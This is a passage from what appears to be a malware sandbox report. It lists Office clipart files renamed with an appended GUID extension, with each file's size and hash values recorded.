SHA256: 33ddee5a114de837b7f20b630e39ccd0865b9dc2286a038c997a01a195ddf00a
SSDeep: 96:f0JATtpyhvGekP6nZmW3a8Eq/eJF0CewgHteQu+6kJIMIacznYi:iABpyhvGeXnA0nEq/eXEwgNeQusIMIfn
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107344.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.96 KB MD5: 28c571583acb96ba574606b8fcb2d214
SHA1: 45b221d81c8a3afe87c4cb7d0dfcef4b122695da
SHA256: b634a8a90f7d6e33814562921df2c79216c1c22c920d6854db43552cbae91083
SSDeep: 96:rJTW9/hZuqLZIPsZ/LsgBOwS3yf5Fxz+H7YtbnzXFuS/E0kxemRaax:tTeh0qLZIPA/LgwS3q5FN2mnzXkS/EJ/
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107358.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.78 KB MD5: 1ef7bc314b433958b762398456ed388a
SHA1: 732d425d80074e30ca13fd645362fc5ad83f63ad
SHA256: de77cb3c495d168ea80b6256d7e64c0f7c253599bcf0196589966f24fcbc734d
SSDeep: 192:zUmZYHcSlAAhf2qCsjpiouc/NG/k70O7LrwggP2BZiG6+ysBzcG3kK:zUmY8SlAAp2vsYfING/JO74gHZa+ykz/
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107484.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 2.97 KB MD5: 6f13f2284500bd47ed0bf23fcaa0f7a8
SHA1: eef797b0d2642158f6af3471ccfb445871ac8408
SHA256: a0dd55bbf53e626910223c5c3d9a1f987228df74bd1e499d752cbb9d4a6ac281
SSDeep: 48:1xTJB4gYT8lXeSV3H1knOaYlpB9AYg/21QL6FdiEdiYTlrwjpgKTpXxLJdUU3yrW:/T5JxeSV3in4BKYC2KL6Fd5i0ILTpXxT
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107490.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 16.08 KB MD5: 9247f58070d51761a684f8bb56d26ac8
SHA1: 46d21c5cdb7d9b1e2649c49705bedd2ecf52f247
SHA256: e21264dda6d2ae08598653fbd1852f9e3e0e9c2608eb7868d6e32bb2109152aa
SSDeep: 384:aGUMrePgD+pn3unFxlGGQ4gWRfWxIvYZW/bE7uj71Q8WAotZUbiKKF8IU3y5swY4:aGUMrePgU3U24gWRfWxIvYZW/bE7uj7y
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107492.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.70 KB MD5: da0167f66cb57c20c5bebfdcf957c899
SHA1: eecddfe27b8512211f93fada2550b40fca9f5c54
SHA256: a4e6eadf227de58304edfd88adbf26eecf739d5c49db7fc41d7f0b40ef1ca088
SSDeep: 192:YBkTeQOhnNlt3qcXub6hvjidWqSHRoYLn1TzGnvObFFTeBVTNAS1aMpVcEFFG1iL:YBkiQyNO+ub6hvjidWqSuYTxzGnvObFY
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107496.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.66 KB MD5: 20cc43b3c931aa375fc2bf1b1806f8ee
SHA1: ce5361caed2368b748cb8568bc4d6f5ed64177bd
SHA256: 38367b52da0775dc1ba493631c040cd6b1b916b67ce3ff94f96136527cd5ab5b
SSDeep: 192:OSG1UDj7+bw7AgnZn9lRUYMFTxrPA3AoHL2nKbHPmJ27qZyCvdC8/xP2CQzWEV8X:OSVj7+E8gntLRUYuTR4Q42nKbvmJ2mZl
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107500.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.10 KB MD5: 64901e11e214c509ea7cbc29ec336872
SHA1: 862d22352952a93be32522be6c3431ea303689af
SHA256: 5455a73a69cd53baaca1bd284eb53a7b0001b0b1efa522e7c6429ee0003fd39a
SSDeep: 96:VJnAHgvBWqLQyX0GyXR9Og76GzYM1UwgLkcKbW6PaXs:/nAAvNl0GER9V6wYM1UwgI5bW6Pac
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107514.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 11.92 KB MD5: 42f189bc270c0030b7de065404eb420e
SHA1: a9886961b2b975c15019bee4b4f399791ff4224c
SHA256: 6294f9f78e527a3907c636d97f1f6c2d69a802c82f170ab80b10f2265e51d5be
SSDeep: 192:mp/Ceguizbuki0ZS5dpKJ0NVSVJ1P/gSAhe204cMW6hY3tY2WP7q94XjUM/BWgF2:mp/C1uIvSLweN4VJ1HgRhe204cnax5Pa
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107528.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.63 KB MD5: ce628bdb6a59478af605ad56538e6174
SHA1: 7338072f778660648366c3834bea29b68454bacb
SHA256: bf0e95c029cd5c5990096133bd27f47ee076bf8de0e43d92407518d396c10de1
SSDeep: 192:ZQrcl9+0pmtiVWbO7O90QwSyOKLAjOuDP/HTdSg462hsQEMB5S/iZhxJ85J:ZQre9+08GSOHNSyOKL4OK/HTdSg462mF
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107708.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.70 KB MD5: 5b963cb2eb1e3967124d0304800ef96b
SHA1: 11115a4693e185d8174f8d11101f36c5b42b8786
SHA256: 7854c8e09e6a6a66373f6b215a6690e20bca1d5c738bfba965c8c5bfb1fc012e
SSDeep: 96:OJMyJXl2RHCCTp5QNcsXdT9fyuvbbt9uqU59flOz5WQ4Ssv:EMs2nTp5QNcsXdR6ut9uqU59flO1WNSA
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107722.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.07 KB MD5: 4ee5d839479dab65a711317e5322ea8a
SHA1: d1605f2636ba62cb955d7ce11d8b9e2cbff2d305
SHA256: 876f419d4561ec2ad0d2814fcb7c3d97a8af0b5f51f3f0a42513cc3d9e3ba1a0
SSDeep: 192:em82uhwGXgWxtv/NOEJBks68uu9LDtwhQN5seX/jaeVswHuSvld8TSvEKdzBrpax:e92uhXgWxt9OE3ks68dw+N5s0jrVswHU
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107724.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.85 KB MD5: 75a70041719c779fa86539f6063bdb18
SHA1: 4fa345af48040d62e55cb1338f0e0691382eb424
SHA256: 1fffbc0b397b7637f41542678b4c3022c6c145bbcc3ab31988bd845310df75f5
SSDeep: 192:HfEdB4sMwSdp58dKJd6sJS4q5colk8dxlQ1Ycb/aYQ+BinApTSSEd:/EdB4sMwSd78dKJd6sJS35tk8DlQ1Yiw
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107734.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.07 KB MD5: b44d8ecace13baca6764bb58c03b3325
SHA1: 227814004623bff0ee19471b16cf2b65c7818d8a
SHA256: 3a91efac49465809b7a0f70613749722781ec3b9be801e22ca664c976d1f838a
SSDeep: 96:YJsV7N75dCR1z+CUdePwfjJJBk1tAvJizB/HoAy:+sV7FCyZpjnBkovJgBwr
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107748.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.03 KB MD5: 30d48ec00649ebadb258aeae7957676d
SHA1: 21ccfe601342c380ebac6e0251016bb005c7298b
SHA256: b3b19e29a66f578e514cd363ffa9eaf8e5ce46963a82941ff9fd47de99adb8e0
SSDeep: 192:dAxe6y8AGYfIopyt4/SBWz1sXcaEaJQf8WLAMXB15kbhR8vOWAYcPRyld7RKW:df6y8ALfjpyt4WGGMapW0qfXf5klR8vB
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0136865.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 16.32 KB MD5: 7ba521934c7cc9f3f088ac6c05b43f51
SHA1: 281cfef97f95ada4a9ea1f449efa86d2cec972d7
SHA256: b8eb3ecdff39e5e590a1d24a186daa30e5603c4a67424b51f29e1e76e2f3075a
SSDeep: 384:tK68csGyICQYwtwUP9mYXpuRw605mI0y3ZK:tK6ppCKtpPEupuRB0pvg
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 39.29 KB MD5: 7bd43b35fc14c73347a857e1670010bb
SHA1: af7c54c38dd6b83c0a9ebd5a00fa3cb05383fa80
SHA256: 803c3b8f752fb280c639bdebf25adbc36b5896d97cd69cd129e76cf5503aab91
SSDeep: 768:s1YqmpAw9e2LaSGinuPBwEw3EXf0pKOIWgYZm9BS0PFWv6ITMCx:sGqPw9oSGS3EwSfqpIWOOmRaMa
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 17.45 KB MD5: 1aecd4e04a40ef8ebb3a348b68ec496d
SHA1: 555ec7fb35ef85c33745cf6a69709c1dc2261342
SHA256: 235db5a13f61cbf316d0091815202d81b04aeccccdfc01480e901bb811b9e89d
SSDeep: 384:cQemEStq7UHClydnC8k+P8ay7uQ7Q+14XCcBW:cQ/98oXlLPi7/7WdBW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 31.10 KB MD5: f67fd4abbea7272f218bba2256337f04
SHA1: 9bb992f3fedb3ac0c2c4f68e7539fa4653a3076b
SHA256: cb5d78c7686721113af934bf92bc92019f5e1bb67fe50ac132c55b81030536d6
SSDeep: 768:lo+et8YQumate7HJ/QZQg7VdKdG0X1viftlxQw5qRY2MXm3FZ6gibI:lretvst4LynviF3Hl21dik
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 34.59 KB MD5: 577815f286156dbdd3bb9ab567980413
SHA1: dac0f14db5a06321ffd14b13d44a5ec15679963d
SHA256: 28e36445c3b26ae27b77ca84001870fa6ae7d881b0e331667087b0c451c36e6a
SSDeep: 768:aVYyOTdDHTnJk8nhg/X4epV66x2sDkTd2p1azJbeW0ZqaZcx8vW:mK5Hjjnu/XVp8MDkTCaNbe5ZYb
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 38.62 KB MD5: df67282233a5eef618ce898174493eee
SHA1: fcb164371342e70fffc61d07b9d2648b50e40123
SHA256: fe099bb15227c9cfb5ab87959e9e1f1c2c0ed36531f053e0e0c48fa838b1573f
SSDeep: 768:7zB1RP3NT+eOEs4bNaQgk0kKlTf12raYEtCWnXV2IzvqnEjh7aKehe1Syg0MR:7zB1VKEs4bNDJKBN2ZEtCWTzSnEtafeW
False
c:\users\5p5nrgjn0js halpmcxz\appdata\local\virtualstore\program files\microsoft office\clipart\pub60cor\j0148757.jpg 65.96 KB MD5: 926c4e3f94377d5b4b1cb72133802cea
SHA1: 9159c1df949a1aac202b8fb67d8216a46d40eae3
SHA256: c7b2995aca2301c14e82456aa259a4af4aa2e604685d8e8570e442c118713a83
SSDeep: 768:WagpWKFSaFdUmQ9RKigCX9lePb9QHr1sLnff1f4zp+wIBReT5ojF5mW8jgar9uh4:WTptoiw98hQZszffdwEeT812TcVmsEvB
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 37.34 KB MD5: f240864d65a238cbbc5bf4f1b5507ae4
SHA1: e5f4bfca86c4f4dd99086d12495051490a24922e
SHA256: 4eab342e3bfcf60521a872b0ecaac34b3552b190cb004a90e78387920f17dfcf
SSDeep: 768:WWiZ7ZETkaahRufZ+5iAK6luLGXot0f+OiE79b0WZrim8r5:WWiNZOahU6suoC+OL79b0WZrqr5
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 26.75 KB MD5: 267a10d69eb167a484b8d061cca9ce54
SHA1: cb053deb0afcab58fe6a4fec626723a577068c26
SHA256: 260a29f926718feac2da766f4747cf4454b2d0b611bd4097e85b782f999a2b54
SSDeep: 768:UU9AWDl+EsRJMXGgdKSnWwrcJgFc3g5L1woJM:UUtJ+xy2oEwISc3YL1wAM
False
c:\users\5p5nrgjn0js halpmcxz\appdata\local\virtualstore\program files\microsoft office\clipart\pub60cor\j0149118.jpg 63.28 KB MD5: e5cb999e58b1a1e81e54914ed07cc501
SHA1: cebdebf5e5cccae95f98ce07ddb20a5c7e6828bf
SHA256: a301828d82305ca75550945c824cdad93df5bee22a16d399ce51a3ca73cbf9ed
SSDeep: 1536:WScZE7IEe7juEa7SBk+pD8N7CvKJewgBAFOtQXzym:wZOefuhSBT8IRwROtQv
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 64.75 KB MD5: cc6bf2db689692328fe52d85bc50972c
SHA1: 428b7a08ef5a6928e6c1847195a5a3ee023f8510
SHA256: b5bce62d42e4ccee30aa2db008ef5248a6171c52ef181b437fcfe978e88b6a55
SSDeep: 1536:TrcLtRn6nRGz++MFai4KsZ+J/nMIshUVEAhnIG7lfh3540OPHBELE73C:TkD6sMFasI+J/YhU57NKN8
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0150861.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.30 KB MD5: 1b66daf4bca48dbd20b2f3116a0ae071
SHA1: 51ecf43b2832a7240c751e4bdd2caec9672a7845
SHA256: 7119e5ea01a50a5f613622d886976cfd807a3be49456a658fd3d2a2db1645e43
SSDeep: 192:gaP15UMtS1TZGQV0sf1E4p8TbTUTMT1TSTCTgT3TtvTWiqTnfSlw95Fe51uvdQzW:ga95/OGQV0sf1fKvQAZmGszJvCiqbuKr
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151045.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 15.10 KB MD5: 3270cbe5489eeef74a7073ad8f3fa3f1
SHA1: 9fc2401e1bd3e19c36a502a00c50ea82d30dcb54
SHA256: 54e2808c0d0b1712741b54408d890281fdf4cc81daf2e569fbcc76c370e862e2
SSDeep: 384:2iuLCHn8RD1ldU4eEeV/FmwKaPShaKIwQDg1byKm6D5u53+CA6RrBQJDq8ZkZb6i:2iuLCHn8HldU4eEexFmwKaPShHXQDgBw
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151047.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 18.07 KB MD5: 819b5916b6ffc02747c899cedb88ab18
SHA1: a6a3f78a4161df02cff321d642e2e95793148721
SHA256: 212508efed132ea8b4ecb4b4ca81b415638ca92b9a8240ddaa30ed2d29667a4b
SSDeep: 384:kHI4MMeS/KCzteQ322sgPEkCW5Z31efH3HD3mQjR1xU6m8IG6r8xD60nCZ8bRKvf:kHIxMeS/KKtJ32VrZW5Z31IH3HD2Qjri
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151055.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 14.29 KB MD5: b70f7083e482670f07761b3eba4f7653
SHA1: 8656e17ebe87e25438d59175416eb5ab3a002078
SHA256: 2adb0bae434d01991c3358618bd868189a92d570adb2f895796958c0d8a7c3d9
SSDeep: 384:tIeoAEIA+SolPWqrR6sGkQBMf3h0v0rzItdo3wSTxXGi9lS0UfEMfiht+qk+4JZl:tIe1Ed+1RW4RJGkQafhitdoBTxXGi9kt
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151067.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.90 KB MD5: 4abdb70b1565a5b99c3a0a811b8005fe
SHA1: 5c9d8732c0e2c27ce1d4bd42ad4db85e32518738
SHA256: d17ea9af9d32bcd29b9692f3405240c579cad030944ee614aa3295412088ead8
SSDeep: 384:XiF8jWNiqCmIdgO6u3ES1bcOMcldt/QoHswhmJ/c2FsoklgelzBuYcv:XGacfZIdgOh3ES1bcOMcldt/QoHs+mJH
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151073.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 13.02 KB MD5: e192d23afa614af9da07f7026f577ff0
SHA1: 7d5682c665ed20debcc9786252452a632036ac6e
SHA256: 90252024635e0080a78002886e03e1d042fb3145c47f43848c8aed8f8dcb6ad1
SSDeep: 384:krTnE92wSMl7iOILFvYLcvBfEwAyShjhlbG3gfGP:krTEHSA2OIvycvBfpAyShtli3gfGP
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152430.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 13.80 KB MD5: 8510fa30a4c1f846858af745ede11d31
SHA1: b4b851862579fe5651f4f78dc440441aa0aad90f
SHA256: 5aa2210b7053c599f442d4584dd3955214e88af9ad95d98913b0ecb816ec42a3
SSDeep: 384:C60BgxajtAjPUugXodsDm4g9Ri4gBbovuua2+PWbAt0hGm1oVxJKJa2ncZgkW2+h:C60sgerUu8odsDm4g9RiJBbcuua2+Pi5
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152570.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.29 KB MD5: e78c9b7c2da95ce9c203b49d7b637441
SHA1: ef4f93fbd7292e947560d00276bdc1577264a093
SHA256: 329141035fee17d74a76cfc973a9466685dc272e872469145fe89844672c52dc
SSDeep: 48:1KB4gYT8SRwNsg0GPItGGCNtg+FtAusLYpBLNqsJTPm9haEFFj4YMrW:iJaymGxtgEtsLYpBBqWTO9hVFB4+
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152600.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 9.54 KB MD5: ba88d3161c20b9468ed14476f77a0e0f
SHA1: 5f97a5d3b79cba3266cd0b6f330b6b52f84df49f
SHA256: cd5e178a1b0b01a83375a303fdea51f269234e1c64f7d7674b0e7e5586bea1b8
SSDeep: 192:hIlTrwgFoutRvANb3iOg55SFn9h7Ltovs7fNowMzhVRFDU2d2y48VwvguNpvrbVL:hkTrDFouTvgzagF9h7LtQGNowMzTRFDA
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152608.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.15 KB MD5: 2ad568972c50977765b486541f2f0f02
SHA1: 5064dce9110a633bd6f11a206fcc3420bfd3e438
SHA256: 8549a6a335d71781d105b2250111d20e09535c0bc1e5dc0723445b2af46ee9a9
SSDeep: 384:3tLbjHfRsXGMhnIkkFpVEFCu2H40F3+T+vKB8mEFp8R9nRrtrLjNvTgl7bgoE3:3t3j/iXGMhnItFpVEFKY0F3+TGKB8mEG
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152610.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.82 KB MD5: 7303d6651155dfb47159a94c029c5550
SHA1: b7f0ba1320845f6d892224bdd316e69e2830a8e3
SHA256: f6ef1dc3ec495d5def0c22a207a28c2c63843cdeb8f1138985134a71369566a8
SSDeep: 96:NJlZIAL0Q03bgpjK+qsSqrLXf0m4ipA1uTbJFggo/FJtaC/T6:HlZIk0BgpPTtrLXfN4iy1uTbJFFo/FJ+
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152622.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 9.38 KB MD5: 15f1274e700ff1022fff68fba3408efb
SHA1: ae9679b781031d315d84a70dbaaea99b2b283ee0
SHA256: e4616919f79afb780d8b209f7a9a1e2c8e6189cff4585e9e068de83785c2dddf
SSDeep: 192:hZLxhllF9mVWzTPd+uiiJXeuXv232WsGowVGxHUmrZAHQiEK7OEYAKRP6JZOPJIM:hZLxhvF97zTPdLpXe6O32NfxHUmrEQiE
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152626.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 25.63 KB MD5: e661c2dae9d7f40771cdf45e7b8177e9
SHA1: 2d2ee866f0443497f375c7c58b9717def821decb
SHA256: 5bcf176b5309c0c4d54b8e05283be4dbc431b00fc1936e4fb2e53a6d24643db4
SSDeep: 768:EDBgg491ZSGe9cM25J9KHKaoThhN4HrxetsD9n/yfET4aVb5uqM/i3QoXY19TL/O:FiVbEx7q2f3PKrK1c
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152688.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 33.86 KB MD5: a9eb303e67a91b8f11dd262740483299
SHA1: 52ba3e7755528c70202f5d1b16c016edd673bb77
SHA256: 033fa92cf10def81e0b1f33f9d9d84c016faf5b9082d8519e29c1b0bf1ad2a45
SSDeep: 768:Fa4wVo8kO2g9AgFdcAoFpJ6+COUsA4gTblGDzgDIDEoHm2or3vGrC2MUSeZk2xdb:gegIgWChXchn7D
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152690.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 1.24 KB MD5: 817ea2be70ef55c7d9cf3e2f3578168a
SHA1: a7857682a2754d3bf5351b7c339bbeb0a3153897
SHA256: e6b5d614adb68f1ec33bd95c84f3e898abe27fd8b9715946940761b1c64522f1
SSDeep: 24:t/Kw0kJ5IB4gXoim8/6Xw2CTY2CTycZ2CTgn2CTx2CrbPFcL2CT+27bKA19YKm/:1KRB4gYT8C04WQobfPq9NW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152694.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 1.32 KB MD5: 056264a5d0e339a496b4d6040d395d3b
SHA1: ac287ee34d2332704ad92f1405b3f1ef1b71f80e
SHA256: e37abfe9167821dd34a458d7a43792c775c15c4fdcf236e17e3fd72d4bf0539c
SSDeep: 24:t/jd0M5IB4gXoim8y695fzwqOzs2C9c2CQ22CTGG2CoM+aK2CT/OJM2CjXDn2CaV:1qB4gYT8r5nOc9oQ2xoM+ttjdFW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152696.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.15 KB MD5: f0b7fe13a312000a78ff518b167d78d9
SHA1: b5df12f0db562445d6eeb3f805398f295537d1ef
SHA256: 1690bf59e94324c96d21bec18fc01086996545b486bc1b9e64ea763557e8b3fa
SSDeep: 192:YcuJIkJyBWJfiOOaf44lngR48nOirT4A36PPg:Y3JI+DPf4zC8nOirTF3EI
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152876.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.69 KB MD5: f57c1fb7363a7784b37b4185a8c43cd3
SHA1: e9778162687ff1fcd16cdcdae661df1a1884fed9
SHA256: f7cc52dcc63172e355fe1c67c3fcf6d7398e798e70daf156c5e2564a797fb6c2
SSDeep: 96:hJ3TnkzdK6kgdK195nAFAMc6w7DXCDPG4Nq8T5Wmz7z73B7jIsDDti3WunWaKXnJ:Lj6drEr+FA4wybHqMRUsVi3WunWdnqLC
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152884.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.79 KB MD5: 17790cd0e64fb4c754dc519572f6dc7c
SHA1: 3a344c12b41030ef2f48517e7778b67a16481f55
SHA256: 3093bf19a8671ecc7ac488579dc02f6838f83e91c37cbe137f4b0570e7c7de2a
SSDeep: 192:u2TK1lwNKdVe5swIZgXf84JX3PZdabdis:u2TK1lwNKdV1IjHfa5is
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152890.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 1.90 KB MD5: ee744e8e45d8a4860277fc544ab50361
SHA1: 42128479bc8d6f50c90497cd8c886a669ee04141
SHA256: 028df050957f5edd3b927b3702cf82b17a1fa9d3444dbc929356b9755e27e67c
SSDeep: 48:1cB4gYT8AgEuj7EPPkqxDikGzW3n+d0tMeVMaTW:MJ7Euj7Y15GzEn+KtMWMJ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152894.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 11.08 KB MD5: 6e3e4869def594ad6627b4586a87ebf1
SHA1: 957cef3116877a5f0cfe88104098201402a04060
SHA256: 37486a2ac2b8dcbb0dccbee5ece7f3ff988e38de7041cd928aac33659c4f163e
SSDeep: 192:i9wZRNWe5HG4U8L4NwwFaOt7OTrhjNuu44A39UNe0Rq7VjSE4tue3BK3a4zdT35o:i9q7xBG0Lsl37krV4j9U9Rq7VjSE4tuW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152898.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.39 KB MD5: f989fd72b97420f3c515455a7f0a130d
SHA1: 745e2bf7ad4c654e709d6d9566adcb5297730ceb
SHA256: f05c7628fe72306e2d26d2faac386beb683cfef0324e7c914c2d28af4d5d6820
SSDeep: 96:vJU4WEB0mWMYkUW2KzP71ONLyarMDt3HDVAX6sSFi:hU4hGmbbzVUyarMDt3HDVa6sSFi
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153047.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 32.29 KB MD5: a9158aedd4938102c3473af82d09a93d
SHA1: db9d27a26dcbba78de38991e6325033cf08ee7c6
SHA256: 3c1a02c5fd38eb9ec835554a85dcca17209f3ffbdba43cfff5941142c4d72385
SSDeep: 768:Ry1OrN84n4+RXRH4Eu09JQ5l+DS0RkhUGEis9psD60HQf/4ak2CL5nf2HWXWdl:oGHdJnQqiXa45f2HeQ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153087.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 1.87 KB MD5: 00c4ab9825b0f77ce3aa38ccbe238d6f
SHA1: 94f37d2922046f618832c8b3673deb328bb5f748
SHA256: 9e79f182ec15c5a9546cd26ee13b5769c992d3c4ec1dd46b893e6e223cecee8e
SSDeep: 48:1UB4gYT80R1DRJNjlCWUeDH89yvPLq8QqF9+033iwPIYXRb6SCfMuqW:sJ0R5NhCTsvPLqbq6AyyIs91Cfz
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153265.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 2.94 KB MD5: fd667424e7fc140ff549d9f40f0d30ef
SHA1: a8e09d9aeb8542e5acbc80dcac64bd2e3f79e603
SHA256: 8268eb7305260762f121e5c46a221ce708d4c355b848b7178291dd9f563e3036
SSDeep: 48:1XHB4gYT8cWp/kR08LhTUrs3XI/bf1JTALBbVUHyb6IRe5prY3U1b4PlgLTRSd3Y:BHJpN8LhTUaXEPTKBbVv6IRUpr5K+RSI
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153398.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 17.10 KB MD5: 43602e9dde40ff4275a4b7ed755eafcf
SHA1: ba5900f6e0be2438dfb93ddea613d9682579e469
SHA256: 7d343bd475083af050cf51dd0eec8f19d2aa5a01ed767f3b79fe74cde78dee45
SSDeep: 384:m/XvfsMsucKAoKbi0ycD1MvIhgmv97ccFfMId5zhjgZFPLFE+tp2LHRHiIOHoR87:m/nvNcKAfbi0ycD1Mvegm97ccFfpXzhC
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153516.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.26 KB MD5: f48e98320bd746386161729ddbc60a0f
SHA1: 847c387cdf53adec90b3a325dea54edb71740348
SHA256: f9e80dea5de30de55dac8791c6b188c8c3fe450ec282d3a74db174a5939b9d6b
SSDeep: 192:+7El/PYmXXYc9TOq/VyNJBJ22Sf375ZJBGplBZIQSNu0GLmbQRA1ySQkO+a/I1wC:+7El/PYmXoc9Tn/VyNJXZSf3PJB0lBZW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157831.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 11.13 KB MD5: 94d39bb77fba40733e3874b4194f23ff
SHA1: 29acaead5cd4c26192800c0c31737781db952fe4
SHA256: febe2ba9f3363eb8bd01854379462a81f7558010cbb9202522dd9a1055bfa531
SSDeep: 192:1sAi+bmLVaUaHjH7xOxpQvMndz+5o6/3jD83JJriysW1PD+JxPsP3gLBUwRhVle2:K3+bmLMUaDlOxpQvMda5o6/3jD83JJrg
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0158477.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 17.55 KB MD5: eb501c8103c3f13c35567415f6ccfe77
SHA1: 36f319dc9a9f780cc5bf3c5ad39e8d0454c6cc98
SHA256: 2c6a4232d69b5294127fbf6c787774854edf868511035fbb9a3b179ddba2832d
SSDeep: 384:YaMdJG28PIXOgGlILMtykkuXi10EYsU0JkBhj775aIYBkpVp+UkUER9Z108AV5TI:YaMdJG28PxgGlILMtykkuXiaEYsU0JYu
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0160590.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 28.72 KB MD5: 18b901bc52b869a1a893f3b66811b682
SHA1: 30408bd8b4b2fed35a98d33614a12da523b688e9
SHA256: 094a379dc8ded0bd7ad02f9de3dfa82f91143cdddc6eefda03362e1814ab560e
